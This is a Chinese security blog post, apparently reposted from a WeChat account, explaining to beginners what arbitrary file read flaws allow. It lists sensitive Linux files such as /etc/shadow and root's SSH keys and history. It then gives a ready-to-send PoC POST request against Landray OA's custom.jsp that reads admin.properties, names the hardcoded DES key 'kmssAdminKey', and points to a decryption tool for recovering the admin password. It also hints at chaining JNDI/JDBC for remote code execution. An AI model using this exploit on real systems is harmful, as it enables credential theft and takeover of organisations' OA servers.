任意文件读取漏洞我们到底能干嘛？

       任意文件读取的漏洞 大概解释为：一些网站由于业务需求，会提供一些下载模块，然而有些管理员可能没有做好相应的限制导致可以直接通过绝对路径对其文件进行下载，那么，攻击者就可以利用这种方式下载服务器的敏感文件，对服务器进行进一步的威胁和攻击。多数存在于系统中存在文件(附件/文档/图片等等资源)下载的地方。

     那么最近爆了很多一些OA的任意文件读取，但是我们到底能利用它干嘛呢，新手师傅们我们看过来。老师傅可以略过了。

linux的敏感文件存放位置 

/etc/passwd/etc/shadow/etc/hosts/root/.bash_history   //root的bash历史记录/root/.ssh/authorized_keys/root/.mysql_history  //mysql的bash历史记录/root/.wget-hsts/opt/nginx/conf/nginx.conf  //nginx的配置文件/var/www/html/index.html    /etc/my.cnf/etc/httpd/conf/httpd.conf  //httpd的配置文件

    这些对于资料收集还是有一定帮助的，也算是大家基本都知道的东西了，那么我们还可以干嘛呢？其实我们还可以找寻一下是否存在配置信息 或者配置文件能获取到OA的管理员密码呢？

蓝凌OA管理系统配置的路径为 admin.do , 而且密码以硬编码形式存在与本地配置文件中 WEB-INF/KmssConfig/admin.properties 那么我们可以结合上面的任意文件读取漏洞来获取到加密的密码 在根据相关源码内容进行解密

它的密钥：kmssAdminKey 具体方法自行百度

poc

POST /sys/ui/extend/varkind/custom.jsp HTTP/1.1Host: xxx.xxx.xxx.xxxUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.131 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Cookie: JSESSIONID=Connection: closeContent-Type: application/x-www-form-urlencodedContent-Length: 60var={"body":{"file":"/WEB-INF/KmssConfig/admin.properties"}}

进行解密 通过在线DES加密解密 http://tool.chacuo.net/cryptdes

    然后我们开始登陆其实后面还可以利用JNDI、JDBC构造RCE，各位师傅点到为止，讲点武德哈！ 

    所以说这种任意文件读取的漏洞还是很严重的，提供一个思路而已，各位师傅可以多多想想还可以玩出更多的操作出来，这里我就不一一表述了。这应该算是任意文件读取的正确姿势了吧

为各位师傅提供讨论的地方，可以公众号发送加群两个字  让管理拉您进群 欢迎各位师傅加入。感谢各位师傅对我的关照。技术有限还需要多多仰仗各位师傅的加入！

特别声明：

由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失，均由使用者本人负责，我不为此承担任何责任。

作者有对此文章的修改和解释权。如欲转载或传播此文章，必须保证此文章的完整性，包括版权声明等全部内容。未经作者的允许，不得任意修改或者增减此文章内容，不得以任何方式将其用于商业目的。 切勿用于非法，仅供学习参考

我不会渗透，我们下次再见！

原文始发于微信公众号（深夜笔记本）：任意文件读取漏洞我们到底能干嘛？